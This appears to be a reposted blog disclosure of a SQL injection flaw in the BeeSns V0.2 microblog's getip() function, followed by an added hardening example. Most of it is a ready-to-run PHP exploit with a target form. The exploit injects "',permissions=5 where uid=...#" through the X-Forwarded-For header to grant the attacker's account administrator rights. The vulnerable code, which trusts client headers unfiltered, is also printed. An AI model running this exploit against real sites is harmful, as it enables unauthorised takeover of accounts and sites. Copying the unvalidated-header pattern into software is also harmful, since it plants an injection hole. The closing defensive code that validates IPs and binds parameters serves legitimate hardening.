BeeSns Microblog System V0.2 Privilege Escalation 0day + Exploit

    Tech  2024-06-16  75

    Published: 2011-01-27. Author: 子仪. Affected version: BeeSns V0.2. Official site: http://www.beesns.com/. Vulnerability description: the client IP is not properly filtered, so a user can submit a malicious parameter and raise their own privileges.

    This microblog system has a rather nice style and I personally like it. While reading the code I noticed a few problems, so let's go straight to the code.

```php
// Get the client IP
function getip() {
    if (isset($_SERVER)) {
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
            $realip = $_SERVER['HTTP_CLIENT_IP'];
        } else {
            $realip = $_SERVER['REMOTE_ADDR'];
        }
    } else {
        if (getenv("HTTP_X_FORWARDED_FOR")) {
            $realip = getenv("HTTP_X_FORWARDED_FOR");
        } elseif (getenv("HTTP_CLIENT_IP")) {
            $realip = getenv("HTTP_CLIENT_IP");
        } else {
            $realip = getenv("REMOTE_ADDR");
        }
    }
    $iphide = explode(".", $realip);

    // Re-joins the first four dot-separated pieces, which keeps any text after the last dot intact
    $realip = "$iphide[0].$iphide[1].$iphide[2].$iphide[3]"; //! I have no idea what the author meant by this; the IP is never filtered, and that is where the vulnerability comes from
    return $realip;
}
```

    An ancient class of bug; this is purely for fun. - -!

    Exploit:

```php
<?php
print_r('
+---------------------------------------------------------------------------+<br>
BeeSns v0.2 Getip() Remote SQL Injection Exploit<br>
site:www.beesns.com  <br>
by 子仪<br>
Blog: http://www.zyday.com  <br>
+---------------------------------------------------------------------------+<br>');

if (empty($_POST['submit'])) {
} else {
    error_reporting(7);
    ini_set('max_execution_time', 0);
    $host     = $_POST['host'];
    $path     = $_POST['path'];
    $username = $_POST['username'];
    $password = $_POST['password'];
    send();
}

function send()
{
    global $host, $path, $username, $password;

    $cmd    = "uId=" . $username . "&uPw=" . $password;
    // Carried in X-Forwarded-For: getip() passes it straight into the SQL that records the login IP
    $getinj = "1.1.1.1',permissions=5 where uid='$username'#";
    $data  = "POST " . $path . "post.php?act=userLogin HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: " . strlen($cmd) . "\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "X-Forwarded-For: $getinj\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    if (preg_match('#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis', $resp)) {
        echo "<br><font color='green'>提升权限成功!</font>";
    } else {
        echo "<font color='red'>Failed!</font>";
    }
}
?>
<form action='' method='POST'>
目标地址:<input type='input' name='host' value='www.zyday.com'>*请勿加http://<br>
二级目录:<input type='input' name='path' value='/'>*如果不是二级目录,请保持默认<br>
用户名:<input type='input' name='username'>*您在目标站申请的用户名,<font color='red'>建议用小号测试</font><br>
密码:<input type='input' name='password'><br>
<input type='submit' name='submit' value='提升权限'><br>
</form>
```
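As an added defensive example (not BeeSns code and not the author's), this is what a hardened getip() looks like: X-Forwarded-For is honoured only when the request arrives through a proxy the site operates, every hop is validated with filter_var(), and the result is written with a bound parameter. The trusted-proxy list and the table and column names are assumptions.

```php
<?php
// Added example, not BeeSns code: a hardened replacement for getip() plus a
// parameterised write. Proxy list and table/column names are assumptions.

/**
 * Return a validated client IP. X-Forwarded-For is honoured only when the
 * TCP peer (REMOTE_ADDR) is a proxy we operate; on a direct connection the
 * header is attacker-supplied text and is ignored.
 */
function getClientIp(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0';           // no usable peer address at all
    }
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote;             // direct connection: header untrusted
    }
    // Each proxy appends the peer it saw, so the header reads
    // "client-sent text, client, proxy1, ...": walk right to left and take
    // the first hop that is not one of our own proxies.
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    foreach (array_reverse($hops) as $hop) {
        if (in_array($hop, $trustedProxies, true)) {
            continue;
        }
        // A hop that is not a literal IP (such as the quote-and-SQL string
        // in the exploit above) is rejected before it reaches the database.
        return filter_var($hop, FILTER_VALIDATE_IP) !== false ? $hop : $remote;
    }
    return $remote;
}

/** Store the IP with a bound parameter so it can never alter the query. */
function recordLoginIp(PDO $db, string $uid, string $ip): void
{
    // Assumed schema: table `user`, columns `lastip` and `uid`.
    $stmt = $db->prepare('UPDATE user SET lastip = :ip WHERE uid = :uid');
    $stmt->execute([':ip' => $ip, ':uid' => $uid]);
}

// Constructed requests: the injected header relayed by two of our proxies
// (10.0.0.2 then 10.0.0.3), followed by the same header sent directly.
$proxies = ['10.0.0.2', '10.0.0.3'];
$server  = ['REMOTE_ADDR' => '10.0.0.3', 'HTTP_X_FORWARDED_FOR' =>
            "1.1.1.1',permissions=5 where uid='bob'#, 198.51.100.9, 10.0.0.2"];
echo getClientIp($server, $proxies), "\n";   // the client our own proxy saw
$server['REMOTE_ADDR'] = '198.51.100.9';
echo getClientIp($server, $proxies), "\n";   // header ignored on a direct connection
```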